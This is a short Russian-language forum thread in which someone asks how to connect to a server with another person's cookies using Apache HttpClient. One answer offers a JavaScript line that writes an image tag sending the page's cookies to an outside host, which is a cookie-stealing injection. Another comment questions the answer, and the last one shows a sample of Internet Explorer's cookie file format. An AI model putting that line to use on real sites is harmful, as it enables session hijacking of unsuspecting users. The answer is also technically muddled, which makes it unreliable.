# Законнектиться на сервер с чужими куками

Tags: cookie, http, java

Всем привет! Пытаюсь понять, как мне с помощью библиотеки `apache http client` законнектиться на сервер с ЧУЖИМИ куками ?!
Т.е. как нить загрузить их чтоли. Знает кто ?
Спасибо )

Comment: Что конкретно из [документации](http://hc.apache.org/httpcomponents-client-ga/tutorial/html/statemgmt.html#d5e487) вам не понятно?

Answer (score 1):

Вряд ли сам сервер позволяет это сделать. Лучше делать это через JavaScript, например, через Document.Cookie отправлять данные с одного сайта на другой. Или вот так:

```
document.write( '<img src="http://youe.site/link.php?cookies='+encodeURIComponent(document.cookies)+'">')
```

Comment: С помощью javascript? На сервере? `document.cookies?`?

Comment: MUID
0D222E394F116A4B37662B894C116AAA
atdmt.com/
2147484672
1528717952
30491338
1770532848
30344487
*

Это внутренний формат куков Internet Explorer'а